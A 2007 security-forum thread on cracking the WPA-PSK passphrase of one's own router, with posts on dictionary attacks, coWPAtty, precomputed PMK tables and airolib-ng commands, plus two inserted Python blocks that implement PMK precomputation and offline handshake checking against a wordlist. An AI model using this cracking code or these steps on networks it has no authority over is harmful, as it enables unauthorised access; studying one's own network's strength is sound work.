Cracking my WPA AP


damocles
06-21-2007, 10:55 PM
Hi all,

I have been testing a lot lately on my Linksys AP. WEP 128 bit and 64 bit is no problem anymore. But now I wanted to focus on WPA encryption. I have read some information on it, but still some things are not clear yet.

I have switched my encryption to WPA on my router with a Pre shared key. I have put a phrase in it. Not a standard phrase, so you won't find it in any dictionaries.

But now I'm stuck. I want to learn how to crack my own AP with the WPA protection. But how? I can't find any good tutorials on this subject. I have found some videos, but they all assume the keyphrase is in the dictionary.

Is it possible to crack my WPA key when the keyphrase is not in the dictionary by brute forcing it? Who has the right tutorial for this?

Maybe it's just me and I'm a bad user of the search function, but I can't find it here or on Google.

theprez98
06-21-2007, 11:07 PM
Is it possible to crack my WPA key when the keyphrase is not in the dictionary by brute forcing it?
Nope. No-can-do. The passphrase is salted with the SSID.

balding_parrot
06-21-2007, 11:11 PM
You need to search for John the Ripper and coWPAtty and how to use them in conjunction with each other. Also search for how to capture the 4-way handshake.

You will also need a lot of time, CPU cycles or a cluster if you have chosen any kind of decent passphrase.

Also, rainbow tables may be worth looking into.

theprez98
06-21-2007, 11:14 PM
Also rainbow tables may be worth looking into
If you already know the SSID, genpmk will generate your own tables. Only if the SSID is already in a pre-computed set of tables, will those tables help at all...and only then if the passphrase was in the dictionary used to create the tables.

Lastly, you need an already-authenticated client.

PrairieFire
06-21-2007, 11:18 PM
This (http://lastbit.com/pswcalc.asp) should tell you about how long it would take.

damocles
06-21-2007, 11:19 PM
Ok, so whenever I think of something that is not in the dictionary file, it won't be able to find it? That's what I make out of the answers. But for WEP there are all clear tuts on what to do and what not to do. Is there no clear WPA tutorial which takes you through it step by step? I could go and try things out like I have been doing, but that's not really working right now haha

theprez98
06-21-2007, 11:21 PM
FYI, both coWPAtty and Aircrack use dictionary attacks which are not strictly brute force attacks.

theprez98
06-21-2007, 11:22 PM
Ok, so whenever I think of something that is not in the dictionary file, it won't be able to find it?
This is correct. Your best bet to crack WPA is a good dictionary file and a weak passphrase.

PrairieFire
06-21-2007, 11:23 PM
Google Search time: 0.27 seconds
tutorial How to Crack WPA (http://www.aircrack-ng.org/doku.php?id=cracking_wpa)

balding_parrot
06-21-2007, 11:24 PM
If you already know the SSID, genpmk will generate your own tables. Only if the SSID is already in a pre-computed set of tables, will those tables help at all...and only then if the passphrase was in the dictionary used to create the tables.

Lastly, you need an already-authenticated client.

This is why I said "may"

The intention was only a point in the right direction for research, which, if done properly, would show just how impractical this can be given a good passphrase.

streaker69
06-21-2007, 11:25 PM
Google Search time: 0.27 seconds
tutorial How to Crack WPA (http://www.aircrack-ng.org/doku.php?id=cracking_wpa)

0.27 seconds? What's wrong with you man? He doesn't have time to waste like that searching.:D

theprez98
06-21-2007, 11:32 PM
This is why I said "may"

The intention was only a point in the right direction for research, which, if done properly, would show just how impractical this can be given a good passphrase.
I wasn't saying you were wrong...only adding more information. ;)

balding_parrot
06-21-2007, 11:34 PM
I wasn't saying you were wrong...only adding more information. ;)

Don't worry I took it the way it was intended :)

damocles
06-21-2007, 11:49 PM
Lol

I just came out of a work meeting. So much information coming in. I can't get much more out haha.

Anyways, that was what I was looking for partly. And the impossible phrase cracking won't work. So first I have put my phrase in the dictionary to see if it works :)

Thanks for the help and I will let you guys know if it works out for me.

theprez98
06-21-2007, 11:53 PM
So first I have put my phrase in the dictionary to see if it works :)
Other than luck, that's about the only way to make sure it works.

-=Xploitz=-
06-22-2007, 05:50 AM
Other than luck, that's about the only way to make sure it works.

I'm currently deeply involved in an "Alternative" approach which would bypass the entire 4 way handshake. Very little success has been documented by me. But rest assured, if I do find this "Alternative" method, I'll be as famous as Ze Frenchie! :D

balding_parrot
06-22-2007, 05:54 AM
I'll be as famous as Ze Frenchie! :D


You wish ;)
Ze Frenchie! is da man:cool:

shamanvirtuel
06-22-2007, 02:52 PM
airolib-ng is a tool for the aircrack-ng suite to store and manage essid and password lists, compute their PMKs and use them in WPA/WPA2 cracking. It uses the lightweight sqlite3 database as a basis, which is available on most platforms. I've chosen sqlite3 considering platform availability, management overhead and memory/disk overhead.
See the code attached for more info. This is the first version posted and - if accepted - to be included into the tree. There may still be bugs and work to be done before release, as marked in the code.
To test the tool get yourself a current 1.0-dev checkout and...

apply the patch in #217 (http://trac.aircrack-ng.org/ticket/217)
apply the patch in #215 (http://trac.aircrack-ng.org/ticket/215)
get yourself the sqlite3 library and headers
compile airolib-ng with -lsqlite3 -lssl
compile aircrack-ng with -DHAVE_SQLITE and -lsqlite3. This will make a new option "-r" available
create a new database file with "airolib-ng testdb init"
import some essid, e.g. "echo Harkonen | airolib-ng testdb import ascii essid -"
import some passwords, e.g. "echo 12345678 | airolib-ng testdb import ascii passwd -"
start the batch process ("airolib-ng testdb batch"), wait for it to run out of work, kill it
crack your WPA/WPA2 handshake, e.g. "aircrack-ng -r testdb -e Harkonen -q wpa2.eapol.cap"

A "new" tool in 1.0-dev of aircrack: seems to be a nice tool for speeding things up... I will try this later.
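An added example, not code from the thread or from the aircrack-ng project, that mirrors what the airolib-ng init / import / batch steps above do with a plain sqlite3 table, and shows why theprez98's remark that the passphrase is "salted with the SSID" makes a precomputed PMK table useful only for the ESSIDs it was built for. Table names, the ESSIDs and the wordlist are constructed sample data.

```python
import hashlib
import sqlite3

def derive_pmk(passphrase: str, essid: str) -> bytes:
    # WPA/WPA2-Personal PMK: PBKDF2-HMAC-SHA1 with the ESSID as the salt,
    # 4096 rounds, 256-bit output. The ESSID salt is why the same wordlist
    # has to be recomputed for every network name (what genpmk/airolib-ng do).
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)

def init_db(path=":memory:"):
    # Equivalent of "airolib-ng testdb init" (constructed schema, not airolib-ng's own)
    conn = sqlite3.connect(path)
    conn.executescript("""
        CREATE TABLE IF NOT EXISTS essid (essid TEXT PRIMARY KEY);
        CREATE TABLE IF NOT EXISTS passwd (passwd TEXT PRIMARY KEY);
        CREATE TABLE IF NOT EXISTS pmk (essid TEXT, passwd TEXT, pmk BLOB,
                                        PRIMARY KEY (essid, passwd));""")
    return conn

def import_essids(conn, essids):
    # Equivalent of "import ascii essid"
    conn.executemany("INSERT OR IGNORE INTO essid VALUES (?)", [(e,) for e in essids])
    conn.commit()

def import_passwords(conn, passwords):
    # Equivalent of "import ascii passwd"; WPA passphrases are 8..63 characters,
    # so shorter words can never be the key and are dropped up front
    rows = [(p,) for p in passwords if 8 <= len(p) <= 63]
    conn.executemany("INSERT OR IGNORE INTO passwd VALUES (?)", rows)
    conn.commit()

def batch(conn):
    # Equivalent of "airolib-ng testdb batch": compute every (essid, passwd)
    # pair that has no PMK yet; returns the amount of work done, so a second
    # run returns 0 ("wait for it to run out of work")
    todo = conn.execute("""SELECT e.essid, p.passwd FROM essid e, passwd p
                           WHERE NOT EXISTS (SELECT 1 FROM pmk
                                             WHERE essid = e.essid AND passwd = p.passwd)""").fetchall()
    conn.executemany("INSERT INTO pmk VALUES (?, ?, ?)",
                     [(e, p, derive_pmk(p, e)) for e, p in todo])
    conn.commit()
    return len(todo)

def pmks_for(conn, essid):
    # What "aircrack-ng -r testdb -e <essid>" needs: the precomputed
    # (passwd, pmk) pairs for one ESSID only
    return conn.execute("SELECT passwd, pmk FROM pmk WHERE essid = ?", (essid,)).fetchall()
```

The PMK for passphrase "password" and ESSID "IEEE" is the published 802.11i test vector, so the derivation can be checked against it.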

wotterspoon
07-03-2007, 11:24 AM
I'm currently deeply involved in an "Alternative" approach which would bypass the entire 4 way handshake. Very little success has been documented by me. But rest assured, if I do find this "Alternative" method, I'll be as famous as Ze Frenchie! :D

Hi Xploitz,

Currently I'm deeply studying WPA, and I'm very interested what alternative method you came up with. Can you give a hint?

If you're not after the 4-way handshake, then you're looking into the encryption algorithm itself, which will probably restrict your attack to WPA1. OK, for a successful decryption of a packet you'll need the TSC, MIC, TK, TA and the key mixing variables from the TK and TA.

I'm very curious what your attack vector is in this.

Greets,

-=Xploitz=-
07-03-2007, 06:35 PM
I've scrapped the alternative method idea of mine. Why? Simple.. I'm too inexperienced in WPA/WPA2 and algorithms, to be completely honest. What I had planned to do was, with the essid of the AP, determine the make of the AP and cross-reference the algorithm used by the manufacturer and create a "custom" salts / hash table... but.. unfortunately.. my lack of experience is hindering my progress. Oh well... at least I conquered the FAKE MAC INTERNET ACCESS demon problem for Atheros chipset users!

wotterspoon
07-04-2007, 06:47 PM
I've scrapped the alternative method idea of mine. Why? Simple.. I'm too inexperienced in WPA/WPA2 and algorithms, to be completely honest. What I had planned to do was, with the essid of the AP, determine the make of the AP and cross-reference the algorithm used by the manufacturer and create a "custom" salts / hash table... but.. unfortunately.. my lack of experience is hindering my progress. Oh well... at least I conquered the FAKE MAC INTERNET ACCESS demon problem for Atheros chipset users!

Well, the algorithm is independent of the manufacturer of the AP, otherwise it won't comply with the 802.11 protocol specs :)

You can create a rainbow table of hashes for a specific access point, but you'll still need the ssid, a valid MAC address, the 4-way EAP handshake and a good dictionary file. And this will take a long time to compute.

WPA1 still uses RC4 (as is used in WEP) encryption, but the cipherstream is mixed with some variables which are derived from the PSK and some other numbers (ssid, mac). So the weaker RC4 is protected by some components which make the complete algorithm (TKIP) very difficult to break.

Well, there's always bruteforcing the PSK.

Fake mac address problem? What's that about? I've never had any problems with any of my Atheros cards?
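An added example, not from the thread or from coWPAtty/aircrack-ng, of the check those tools actually run and why balding_parrot and wotterspoon insist on the captured 4-way handshake: the per-session PTK depends on both MAC addresses and both nonces, and only the EAPOL MIC from the handshake can confirm a candidate passphrase. The MACs, nonces and EAPOL-Key body are constructed stand-ins for a real capture, and the last function plays the station's side so the sample handshake can be generated offline. It also shows the thread's central point in code: a passphrase absent from the wordlist simply never matches.

```python
import hashlib
import hmac

def derive_pmk(passphrase: str, essid: str) -> bytes:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, essid, 4096 rounds, 32 bytes)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)

def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # 802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion", Min/Max of the
    # AP and station MACs, Min/Max of the two nonces). Every field comes from the
    # captured handshake, so nothing can be verified without it.
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                            hashlib.sha1).digest() for i in range(4))
    return out[:64]

def eapol_mic(kck: bytes, eapol_zeroed_mic: bytes, wpa2: bool) -> bytes:
    # MIC over handshake message 2 with its MIC field zeroed, keyed with the KCK
    # (first 16 bytes of the PTK). WPA2/CCMP uses HMAC-SHA1, WPA/TKIP HMAC-MD5;
    # in both cases only the first 16 bytes are transmitted.
    digest = hashlib.sha1 if wpa2 else hashlib.md5
    return hmac.new(kck, eapol_zeroed_mic, digest).digest()[:16]

def find_passphrase(hs: dict, candidates):
    # The dictionary check: one PBKDF2 (4096 HMAC rounds) per word, then PTK and
    # MIC. A candidate that is not on the list is never tried, which is why a
    # non-dictionary passphrase makes this return None however long the list is.
    for word in candidates:
        pmk = derive_pmk(word, hs["essid"])
        ptk = derive_ptk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol"], hs["wpa2"]), hs["mic"]):
            return word
    return None

def sample_handshake(passphrase: str, essid: str = "Harkonen", wpa2: bool = True) -> dict:
    # Constructed stand-in for an airodump-ng capture: fixed MACs and nonces and a
    # simplified EAPOL-Key body ending in a zeroed 16-byte MIC field. The MIC is
    # computed the way a real station would compute it for message 2.
    hs = {"essid": essid, "aa": bytes.fromhex("001122334455"), "spa": bytes.fromhex("66778899aabb"),
          "anonce": bytes(range(32)), "snonce": bytes(range(32, 64)), "wpa2": wpa2}
    hs["eapol"] = b"\x01\x03\x00\x5f\x02\x01\x0a" + b"\x00" * 8 + hs["snonce"] + b"\x00" * 16
    ptk = derive_ptk(derive_pmk(passphrase, essid), hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])
    hs["mic"] = eapol_mic(ptk[:16], hs["eapol"], wpa2)
    return hs
```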

-=Xploitz=-
07-05-2007, 10:31 PM
Fake mac address problem? What's that about? I've never had any problems with any of my Atheros cards?


I guess you missed it.. lol. If you knew how, I sure could have used your help a month ago!!! Here's the link to the whole ordeal. No one could get their Atheros chipped card online while using a FAKED MAC address with BT2 Final.. for BT1.. yes, no probs.. but when BT2 came out.. no one seemed to know how.. or they were keeping it a secret.

http://forums.remote-exploit.org/showthread.php?t=7117&highlight=fake+internet